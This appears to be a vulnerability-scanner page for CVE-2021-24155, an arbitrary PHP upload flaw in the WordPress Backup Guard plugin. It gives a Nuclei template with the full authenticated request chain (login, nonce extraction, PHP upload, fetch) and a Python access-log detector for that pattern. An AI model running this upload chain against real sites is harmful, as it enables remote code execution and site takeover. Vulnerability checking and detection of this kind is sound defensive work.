WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload
ID: CVE-2021-24155
Severity: high
Author: theamanrawat
Tags: cve,cve2021,authenticated,wp,packetstorm,wp-plugin,rce,wordpress,backup,wpscan,intrusive,backup-guard
Description
WordPress Backup Guard plugin before 1.6.0 is susceptible to authenticated arbitrary file upload. The plugin does not ensure that imported files are in SGBP format and extension, allowing high-privilege users to upload arbitrary files, including PHP, possibly leading to remote code execution.
YAML Source
id: CVE-2021-24155

info:
  name: WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload
  author: theamanrawat
  severity: high
  description: |
    WordPress Backup Guard plugin before 1.6.0 is susceptible to authenticated arbitrary file upload. The plugin does not ensure that imported files are in SGBP format and extension, allowing high-privilege users to upload arbitrary files, including PHP, possibly leading to remote code execution.
  impact: |
    Remote code execution
  remediation: Fixed in version 1.6.0.
  reference:
    - https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb
    - https://wordpress.org/plugins/backup/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24155
    - http://packetstormsecurity.com/files/163382/WordPress-Backup-Guard-1.5.8-Shell-Upload.html
    - https://github.com/0dayNinja/CVE-2021-24155.rb
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24155
    cwe-id: CWE-434
    epss-score: 0.96281
    epss-percentile: 0.99534
    cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: backup-guard
    product: backup_guard
    framework: wordpress
  tags: cve,cve2021,authenticated,wp,packetstorm,wp-plugin,rce,wordpress,backup,wpscan,intrusive,backup-guard

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921

        -----------------------------204200867127808062083805313921
        Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
        Content-Type: application/x-php

        <?php
        echo "CVE-2021-24155";
        ?>
        -----------------------------204200867127808062083805313921--

      - |
        GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(header_4, "text/html")
          - status_code_4 == 200
          - contains(body_3, '{\"success\":1}')
          - contains(body_4, 'CVE-2021-24155')
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - BG_BACKUP_STRINGS = {"nonce":"([0-9a-zA-Z]+)"};
        internal: true
# digest: 4a0a004730450220449993bd257861080974af068330727b2b65382c967ce4846764ad3ffd587403022100d90708be42f3e8a8ca9b70a1f52bda56aa85785ae0c0044bc772e1921bd5d2b0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This Nuclei template checks a WordPress site for the vulnerability described above: it logs in, extracts the plugin's nonce from the backups page, submits a file through the import action, and then requests that file from the plugin's upload directory. Run it with the Nuclei tool:
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24155.yaml"
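As an added defender-side example (not part of the template, the plugin, or the original page), the Python below scans web-server access-log lines for the request sequence the template exercises: a POST to the backup_guard_importBackup action followed by a successful GET of a non-.sgbp file from the plugin's upload directory. The log format, client IPs and file names are constructed for the example.

```python
import re

# Constructed sample access-log lines (common log format); IPs and file names are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2021:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0
10.0.0.5 - - [01/Jul/2021:10:00:02 +0000] "GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jul/2021:10:00:03 +0000] "POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=abc123 HTTP/1.1" 200 13
10.0.0.5 - - [01/Jul/2021:10:00:04 +0000] "GET /wp-content/uploads/backup-guard/xk2p9q.php HTTP/1.1" 200 14
10.0.0.9 - - [01/Jul/2021:10:05:00 +0000] "POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=def456 HTTP/1.1" 200 13
10.0.0.9 - - [01/Jul/2021:10:05:01 +0000] "GET /wp-content/uploads/backup-guard/site_backup.sgbp HTTP/1.1" 403 0
"""

# Minimal common-log-format parser: client IP, method, request path, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
IMPORT_ACTION = "action=backup_guard_importBackup"   # the import endpoint used by the template
UPLOAD_DIR = "/wp-content/uploads/backup-guard/"     # where imported files land


def parse_line(line):
    """Return a dict with ip/method/path/status, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return None if m is None else m.groupdict()


def find_suspicious_imports(log_text):
    """Return (ip, path) pairs where a client that called the import action later
    fetched a file without the expected .sgbp extension from the upload directory
    and got HTTP 200. Only an import followed by such a fetch is reported."""
    imported = set()
    hits = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["method"] == "POST" and IMPORT_ACTION in rec["path"]:
            imported.add(rec["ip"])
        elif (rec["method"] == "GET" and rec["path"].startswith(UPLOAD_DIR)
              and rec["ip"] in imported and rec["status"] == "200"):
            name = rec["path"].split("?", 1)[0].rsplit("/", 1)[-1]
            if not name.lower().endswith(".sgbp"):
                hits.append((rec["ip"], rec["path"]))
    return hits


if __name__ == "__main__":
    for ip, path in find_suspicious_imports(SAMPLE_LOG):
        print(f"possible Backup Guard arbitrary upload: {ip} fetched {path}")
```

On a patched site (1.6.0 or later) the import action rejects non-SGBP files, so the second client's request pattern is the expected benign case and is not reported.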